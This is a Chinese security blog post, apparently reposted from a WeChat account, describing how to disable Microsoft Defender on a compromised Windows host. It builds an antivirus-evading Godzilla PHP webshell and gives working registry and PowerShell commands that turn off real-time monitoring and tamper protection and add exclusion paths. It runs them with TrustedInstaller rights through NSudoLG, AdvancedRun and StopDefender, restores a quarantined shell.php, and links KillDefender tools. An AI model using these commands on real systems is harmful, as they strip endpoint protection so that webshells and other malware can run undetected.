安全攻防 | 多种方式关闭讨厌的defender!

admin 2023年1月17日19:05:00评论197 views字数 4929阅读16分25秒阅读模式

声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。


Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。
Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、深入的威胁防御研究和 Microsoft 云基础设施结合在一起,以保护您组织中的设备(或端点)。Microsoft Defender 防病毒软件内置于 Windows 中,它与 Microsoft Defender for Endpoint 配合使用,为你的设备和云提供保护。

1
被攻击目标操作系统环境
(1)defender版本
安全攻防 | 多种方式关闭讨厌的defender!

(2)系统补丁信息

安全攻防 | 多种方式关闭讨厌的defender!

(3)systeminfo 信息

安全攻防 | 多种方式关闭讨厌的defender!

2
攻击前的准备工作
web环境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4
经过测试,用Godzilla自带的PHP_XOR_BASE64加密器即可免杀(php一句话直接杀),生成 PHP_XOR_BASE64 webshell
安全攻防 | 多种方式关闭讨厌的defender!

静态免杀测试

安全攻防 | 多种方式关闭讨厌的defender!

连接webshell

安全攻防 | 多种方式关闭讨厌的defender!

动态免杀测试

安全攻防 | 多种方式关闭讨厌的defender!

3
windows命令介绍

cmd

#查看排除项reg query "HKLMSOFTWAREMicrosoftWindows DefenderExclusions" /s#查看版本dir "C:ProgramDataMicrosoftWindows DefenderPlatform" /od /ad /b#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)reg query "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderFeatures" /v "TamperProtection"#需要TrustedInstaller权限##cmd注册表关闭Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f##cmd关闭篡改保护NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderFeatures" /v "TamperProtection" /d 4 /t REG_DWORD /f"##cmd注册表恢复Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f##cmd添加Windows defender排除项reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderExclusionsPaths" /v "c:temp" /d 0 /t REG_DWORD /f

powershell

#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath "c:temp"#删除排除项Remove-MpPreference -ExclusionPath "C:test"#关闭实时保护Set-MpPreference -DisableRealtimeMonitoring $true


4
命令行关闭defender
TrustedInstaller是从Windows Vista开始出现的一个内置安全主体,在Windows中拥有修改系统文件权限,本身是一个服务,以一个账户组的形式出现。它的全名是:NT SERVICETrustedInstaller
为什么要获取TrustedInstaller权限?说白了就是因为Administratior权限system权限无法关闭 Windows defender
注意:以下工具技巧皆需要Administratior权限才能成功使用

(1)NSudoLG

工具地址:https://github.com/M2Team/NSudo
下载后使用:
D:DocumentsNSudo_8.2_All_ComponentsNSudoLauncherx64NSudoLG.exe

免杀测试

安全攻防 | 多种方式关闭讨厌的defender!

使用方法

注意:此工具的 -U:T 参数是获取了 TrustedInstaller 权限
#cmd注册表关闭Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f#cmd注册表恢复Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f#cmd添加Windows defender排除项reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderExclusionsPaths" /v "c:temp" /d 0 /t REG_DWORD /f#NSudoLG.exe关闭Windows defenderNSudoLG.exe -U:T cmd /c "reg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f"#NSudoLG.exe恢复Windows defenderNSudoLG.exe -U:T cmd /c "reg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f"#NSudoLG.exe添加Windows defender排除项NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderExclusionsPaths" /v "c:temp" /d 0 /t REG_DWORD /f"

安全攻防 | 多种方式关闭讨厌的defender!
安全攻防 | 多种方式关闭讨厌的defender!
安全攻防 | 多种方式关闭讨厌的defender!

powershell成功上线

安全攻防 | 多种方式关闭讨厌的defender!

(2)AdvancedRun

地址:https://www.nirsoft.net/utils/advanced_run.html

免杀测试

安全攻防 | 多种方式关闭讨厌的defender!

使用方法

AdvancedRun.exe /EXEFilename "%windir%system32cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderReal-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run
安全攻防 | 多种方式关闭讨厌的defender!

powershell成功上线

安全攻防 | 多种方式关闭讨厌的defender!

(3)StopDefender

Github地址:https://github.com/lab52io/StopDefender

免杀测试

安全攻防 | 多种方式关闭讨厌的defender!

使用方法

StopDefender_x64.exe
安全攻防 | 多种方式关闭讨厌的defender!

powershell成功上线

安全攻防 | 多种方式关闭讨厌的defender!

powershell

#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath "c:temp"#删除排除项Remove-MpPreference -ExclusionPath "C:test"

关闭 Windows defender

安全攻防 | 多种方式关闭讨厌的defender!

关闭 实时保护

Set-MpPreference -DisableRealtimeMonitoring $true
安全攻防 | 多种方式关闭讨厌的defender!


(4)MpCmdRun介绍

配置和管理 Microsoft Defender 防病毒软件的命令行工具详情
https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus?view=o365-worldwide
MpCmdRun的位置为:
C:ProgramDataMicrosoftWindows DefenderPlatform<antimalware platform version>
#查看版本(查看<antimalware platform version>)dir "C:ProgramDataMicrosoftWindows DefenderPlatform" /od /ad /b#验证dir "C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2210.6-0" | findstr MpCmdRun
安全攻防 | 多种方式关闭讨厌的defender!

基础命令

#查看被隔离的文件列表MpCmdRun -Restore -ListAll#恢复指定名称的文件至原目录MpCmdRun -Restore -FilePath C:phpstudy_proWWWshell.php#恢复所有文件至原目录MpCmdRun -Restore -All#查看指定路径是否位于排除列表中MpCmdRun -CheckExclusion -path C:phpstudy_proWWW

移除Token导致Windows Defender失效

Windows Defender进程为MsMpEng.exe,MsMpEng.exe是一个受保护的进程(Protected Process Light,简写为PPL)
非 PPL 进程无法获取 PPL 进程的句柄,导致我们无法直接结束 PPL 进程 MsMpEng.exe, 但是我们能够以 SYSTEM 权限运行的线程修改进程 MsMpEng.exe 的 token, 当我们移除进程 MsMpEng.exe 的所有 token 后,进程 MsMpEng.exe 无法访问其他进程的资源,也就无法检测其他进程是否有害,最终导致 Windows Defender 失效。
本人没有利用成功过
安全攻防 | 多种方式关闭讨厌的defender!

工具地址

https://github.com/pwn1sher/KillDefender
https://github.com/Octoberfest7/KillDefender
https://github.com/Octoberfest7/KDStab

参考文章

https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGw
https://zhuanlan.zhihu.com/p/538571344
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender
https://cloud.tencent.com/developer/article/1870239

-END-

▎经典文章精选

神兵利器 | 自动化钉钉推送主机端口信息!
神兵利器 | DayBreak安装与使用
权限提升 | suid提权及修复方式
靶场攻略 | vulhub_DC6
安全攻防 | frp内网穿透
环境搭建 | CTFd动态靶机搭建笔记
环境搭建 | 手动搭建域环境
环境搭建 | 手动搭建K8S环境


安全攻防 | 多种方式关闭讨厌的defender!

扫描下方 二维码 加入我们吧!

安全攻防 | 多种方式关闭讨厌的defender!

原文始发于微信公众号(betasec):安全攻防 | 多种方式关闭讨厌的defender!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月17日19:05:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安全攻防 | 多种方式关闭讨厌的defender!http://cn-sec.com/archives/1428092.html

发表评论

匿名网友 填写信息